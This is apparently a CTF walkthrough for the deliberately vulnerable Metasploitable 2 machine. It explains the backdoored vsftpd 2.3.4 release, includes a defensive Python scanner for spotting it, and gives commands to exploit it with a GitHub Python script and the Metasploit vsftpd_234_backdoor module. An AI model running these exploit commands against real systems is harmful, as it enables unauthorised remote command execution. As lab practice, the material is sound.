Hello friends, as we know, Metasploitable 2 is one of the most popular Linux-based CTF targets, used for practice by beginners who are getting into cyber security or penetration testing. It contains lots of interesting things such as DVWA and Mutillidae. When an attacker runs a normal nmap scan with extra options such as service version detection and default scripts (nmap -sV -sC example.com/IP -oN savefile), it shows lots of vulnerable services. One of these services is vsftpd, which runs on port 21, the default FTP port.
vsftpd, which stands for “Very Secure FTP Daemon”, is an FTP server for Unix-like systems, including Linux. In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. Users logging into a compromised vsftpd-2.3.4 server may issue as the username and gain a command shell on port 6200. This was not a security hole in vsftpd itself; instead, someone had uploaded a different version of vsftpd which contained a backdoor. Since then, the site was moved to Google App Engine.
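For defenders, the scan output described above can be audited automatically. The following is an added example, not part of the original post or the linked exploit: it parses nmap normal output (-oN) and flags hosts that advertise vsftpd 2.3.4 or have port 6200 open. The sample scan text and the function names are constructed for illustration.

```python
import re

# Constructed sample of `nmap -sV -oN savefile` output (not real scan data).
SAMPLE_SCAN = """\
Nmap scan report for 192.168.1.10
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.4
22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
6200/tcp open  unknown

Nmap scan report for 192.168.1.20
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
"""

HOST_RE = re.compile(r"^Nmap scan report for (.+)$")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")
BACKDOOR_SHELL_PORT = 6200  # port the article says the backdoor shell uses

def parse_scan(text):
    """Return {host: [(port, service, version_string), ...]} for open TCP ports."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1).strip()
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            hosts[current].append((int(m.group(1)), m.group(2), m.group(3).strip()))
    return hosts

def audit(text):
    """Flag hosts advertising vsftpd 2.3.4 and hosts with the shell port open."""
    findings = {}
    for host, ports in parse_scan(text).items():
        notes = []
        for port, _service, version in ports:
            if re.search(r"\bvsftpd 2\.3\.4\b", version):
                notes.append(f"{port}/tcp vsftpd 2.3.4: verify package origin, upgrade")
            if port == BACKDOOR_SHELL_PORT:
                notes.append(f"{port}/tcp open: unexpected listener, investigate")
        if notes:
            findings[host] = notes
    return findings

if __name__ == "__main__":
    for host, notes in audit(SAMPLE_SCAN).items():
        print(host, notes)
```

A 2.3.4 banner alone does not prove the backdoor is present, since only the tampered download contained it, so treat that finding as a prompt to verify where the package came from and to upgrade.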
First, let’s talk about the manual method. Here we are going to use an exploit written in Python, found on GitHub. So how does this particular exploit work? As we know, the vulnerable version, vsftpd 2.3.4, contains the backdoor itself, so the exploit sends a command to that backdoor, much like OS command injection.
git clone https://github.com/In2econd/vsftpd-2.3.4-exploit.git
cd vsftpd-2.3.4-exploit
python3 vsftpd_234_exploit.py [IP address] [port] [command]
# Example
python3 vsftpd_234_exploit.py 192.168.1.10 21 whoami
Now let’s see how we can also do this easily with metasploit-framework. Rather than discussing msf in detail, I will just tell you that metasploit-framework is a top hacking tool used for exploitation as well as post-exploitation, with lots of built-in modules. It automates most of the work: an attacker only needs to set options such as the target address, port number, or sometimes credentials, depending on the exploit.
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set rhosts [Target IP]
exploit